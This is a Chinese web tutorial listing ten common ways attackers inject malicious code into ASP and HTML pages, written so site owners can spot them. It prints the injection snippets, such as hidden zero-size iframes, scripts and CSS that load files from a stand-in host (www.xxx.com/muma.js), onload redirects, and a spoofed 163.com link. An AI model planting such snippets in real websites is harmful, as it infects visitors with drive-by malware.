服务器之家:专注于服务器技术及软件下载分享
分类导航

PHP教程|ASP.NET教程|Java教程|ASP教程|编程技术|正则表达式|C/C++|IOS|C#|Swift|Android|VB|R语言|JavaScript|易语言|vb.net|

服务器之家 - 编程语言 - ASP教程 - Asp常见挂马方式大总结

Asp常见挂马方式大总结

2019-08-16 10:56服务器之家 ASP教程

这篇文章指在告诉大家坏人经常使用的网页挂马方式,从而可以对自己的网页进行防范,只要检测这些经常被用于挂马的地方,很容易找到木马的所在。

一:框架挂马 

<iframe src=地址 width=0 height=0></iframe> 

其中“地址”处可以输入恶意网站链接等 

二:js文件挂马 

只要是JS文件,都可以通过被恶意修改从而被挂上恶意代码,一般被全站引用的JS代码最容易被挂木马,检测我们可以查看JS代码的左边或下边,坏人很喜欢将恶意代码与正常代码间用很多空格或回车来进行隐藏,所以要多看看JS代码页面有没有被故意拉长等。 

三:js变形加密 

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script> 
muma.txt可改成任意后缀 


四:body挂马 

<body onload="window.location='地址';"></body> 

五:隐蔽挂马 

top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe src="http://www.xxx.com/muma.htm/"></iframe>'; 

六:css中挂马 

body { 
background-image: url('javascript:document.write("<script src=http://www.XXX.net/muma.js></script>")')} 

这种方式比较狠,也比较难发现。 

七:JAJA挂马 

<SCRIPT language=javascript> 
window.open ("地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro llbars=no,width=1,height=1"); 
</script> 

八:图片伪装 

<html> 
<iframe src="网马地址" height=0 width=0></iframe> 
<img src="图片地址"></center> 
</html> 

九:伪装调用 

<frameset rows="444,0" cols="*"> 
<frame src="打开网页" framborder="no" scrolling="auto" noresize marginwidth="0"margingheight="0"> 
<frame src="网马地址" frameborder="no" scrolling="no" noresize marginwidth="0"margingheight="0"> 
</frameset> 

十:高级欺骗 

<a href="http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)" onMouseOver="www_163_com(); return true;"> 页面要显示的内容 </a> 
<SCRIPT Language="JavaScript"> 
function www_163_com () 

var url="网马地址"; 
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10"); 

</SCRIPT> 

如何发现上面的行为,如果多个页面都有挂马代码,那么就需要批量替换工具

  • 挂马
  • asp

    • 延伸 · 阅读

    精彩推荐
    最近更新
    编辑推荐
    阅读排行
    热门标签
    内置对象   生成页面   while   if   多行注释   recordset   adodb   广告   问题   WebService   设置管理   日志管理   ABP   ViewState   Application   Session   动态   Webform   Conn.Execute   Rs.Open   vbs   FormatDate   日期格式化   返回   信息提示   asp代码   Weekday   错误捕获   在线压缩   网页  
    © 2019-2025 服务器之家(www.zzvips.com) 版权所有关于我们联系我们版权申明网站地图